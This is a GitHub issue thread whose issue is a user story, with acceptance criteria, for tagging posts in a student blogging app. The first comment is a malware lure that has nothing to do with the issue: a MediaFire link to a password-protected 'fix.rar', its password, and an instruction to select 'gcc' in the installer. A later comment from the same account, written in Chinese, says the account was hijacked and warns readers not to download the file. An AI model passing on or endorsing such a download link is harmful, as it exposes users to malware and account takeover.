### ISSUE TITLE
Add a Tag to a Post

### ISSUE THREAD

**Issue by stevebrownlee** [NSS-Day-Cohort-71/rare-client-ink_blitz#47]
As an author I would like to be able to associate one or more Tags with one of my Posts so that readers can easily see the Post topics at a glance.

**Given** the author is viewing Post details  
**When** they select the `Manage Tags` option  
**Then** they should be presented with a selection of Tags options to associate with the Post  

**Given** the author has selected the Tags they wish to associate with a Post  
**When** they click the `Save` button  
**Then** the association should be saved to the database  
**And** the user should be directed to the Post details page  
**And** the selected Tags should be displayed on the Post details page

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MinecraftEarthVillage** [comment]
> 下载 https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file 密码：changeme 在安装程序菜单中，选择“gcc”。

十分抱歉 ！我的账户在前段时间被黑客盗用，并且传播相同的病毒文件，如果你们遇到要下载一个fix.zip的千万不要下载！就是它导致我账户被攻占的
